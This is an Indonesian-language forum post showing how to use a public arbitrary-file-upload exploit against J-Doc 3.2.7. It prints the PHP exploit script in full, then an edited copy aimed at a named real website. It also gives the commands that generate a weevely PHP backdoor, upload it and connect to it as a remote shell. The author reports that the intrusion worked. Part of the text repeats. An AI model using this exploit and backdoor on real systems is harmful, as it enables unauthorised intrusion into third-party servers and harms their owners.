08-26-2012, 07:19 AM
sebelumnya ane yang pengguna baru ini mw minta ijin buat share gimana cara menggunakan salah satu webapp/0day arbitrary file upload yg ada di http://1337day.com/exploits/19162, thread ini ane buat karena banyak yg sering pm di fb nanyain ttg 1337day.com, di sini ane hanya ngasih contoh salah satu exploit yg paling mudah yaitu arbitrary file upload.
arbitrary file upload maksudnya bahwa seorang attacker dapat mengupload file tertentu ke webserver target misalnya shell php.
persiapan yang ane lakuin:
1. generate php backdoor dengan weevely dengan password admin dan di simpan di directory /root dengan nama tes.php
2. download file exploit di http://1337day.com/exploits/19162 kemudian ane save dengan nama jdoc.php di folder /root
3. setelah googling dengan dork yg ditulis di file exploit ane coba dgn target : http://www.proges.cfiparis.com/jdoc/
4. edit file jdoc.php dengan mengganti isi dari variabel $base_url dengan web target dan variabel $file_to_upload dengan back door yg telah di generate dengan weevely tdi. sehingga file jdoc.php menjadi :
5. jalankan file exploit :
6. setelah itu ane coba konek ke target dengan weevely :
7. ternyata berhasil langsung ane jalanin module
ystem.info ternyata server windows ....
screen shot:
![[Image: jdoc.jpg]](http://i1112.photobucket.com/albums/k498/koteka_baliem/jdoc.jpg)
terima kasih buat para momod yg udah ngijinin ane buat nulis artikel ini,
viva la backtrack ...
nb: script ini bisa running klo php5-curl udah terinstall, di sini ane make BT 5 R3 dan ternyata error saat ane jalanin, cba perintah apt-get install php5-curl ternyata ga bisa juga, jadi ane download file deb di http://www.ubuntuupdates.org/package/cor.../php5-curl trus di install manual ..
arbitrary file upload maksudnya bahwa seorang attacker dapat mengupload file tertentu ke webserver target misalnya shell php.
persiapan yang ane lakuin:
1. generate php backdoor dengan weevely dengan password admin dan di simpan di directory /root dengan nama tes.php
Code:
root@bt:/pentest/backdoors/web/weevely# ./weevely.py generate admin /root/tes.php2. download file exploit di http://1337day.com/exploits/19162 kemudian ane save dengan nama jdoc.php di folder /root
PHP Code:
<?php
# Exploit Title: J-Doc <= v3.2.7 : Arbitrary file upload
# Date: 2012-08-10
# Author: leviathan
# Vendor or Software Link: http://www.j-doc.com/
# Version: <= 3.2.7
# Category:: webapps
# Google dork: intext:"Système de partage de documents par Projet"
# Tested on: GNU/Linux with J-Doc 3.2.7 - PHP 5.3.2
# Demo site:
// The vulnerable website
$base_url = 'http://localhost/jdoc/';
$file_to_upload = __DIR__.DIRECTORY_SEPARATOR.'info.php';
$file_to_call = pathinfo($file_to_upload, PATHINFO_BASENAME);
$folder = '.'; // related to the divers folder
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $base_url.'divers/upload_filemanager.php?dossierup='.$folder);
curl_setopt($curl, CURLOPT_POST, true);
$post = array(
'Filedata' => '@'.$file_to_upload,
);
curl_setopt($curl, CURLOPT_POSTFIELDS, $post);
if (curl_exec($curl)) {
echo file_get_contents($base_url.'divers/'.$folder.'/'.$file_to_call);
} else {
die('error in the exploit');
}
# 1337day.com [2012-08-10]
?>3. setelah googling dengan dork yg ditulis di file exploit ane coba dgn target : http://www.proges.cfiparis.com/jdoc/
4. edit file jdoc.php dengan mengganti isi dari variabel $base_url dengan web target dan variabel $file_to_upload dengan back door yg telah di generate dengan weevely tdi. sehingga file jdoc.php menjadi :
PHP Code:
<?php
# Exploit Title: J-Doc <= v3.2.7 : Arbitrary file upload
# Date: 2012-08-10
# Author: leviathan
# Vendor or Software Link: http://www.j-doc.com/
# Version: <= 3.2.7
# Category:: webapps
# Google dork: intext:"Système de partage de documents par Projet"
# Tested on: GNU/Linux with J-Doc 3.2.7 - PHP 5.3.2
# Demo site:
// The vulnerable website
$base_url = 'http://www.proges.cfiparis.com/jdoc/';
$file_to_upload = __DIR__.DIRECTORY_SEPARATOR.'tes.php';
$file_to_call = pathinfo($file_to_upload, PATHINFO_BASENAME);
$folder = '.'; // related to the divers folder
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $base_url.'divers/upload_filemanager.php?dossierup='.$folder);
curl_setopt($curl, CURLOPT_POST, true);
$post = array(
'Filedata' => '@'.$file_to_upload,
);
curl_setopt($curl, CURLOPT_POSTFIELDS, $post);
if (curl_exec($curl)) {
echo file_get_contents($base_url.'divers/'.$folder.'/'.$file_to_call);
} else {
die('error in the exploit');
}
# 1337day.com [2012-08-10]
?>5. jalankan file exploit :
Code:
root@bt:~# php jdoc.php6. setelah itu ane coba konek ke target dengan weevely :
Code:
root@bt:/pentest/backdoors/web/weevely# ./weevely.py http://www.proges.cfiparis.com/jdoc/divers/tes.php admin7. ternyata berhasil langsung ane jalanin module
ystem.info ternyata server windows ....screen shot:
terima kasih buat para momod yg udah ngijinin ane buat nulis artikel ini,
viva la backtrack ...
nb: script ini bisa running klo php5-curl udah terinstall, di sini ane make BT 5 R3 dan ternyata error saat ane jalanin, cba perintah apt-get install php5-curl ternyata ga bisa juga, jadi ane download file deb di http://www.ubuntuupdates.org/package/cor.../php5-curl trus di install manual ..
Hacking isn't just Computers & Exploits. It's a Philosophy.
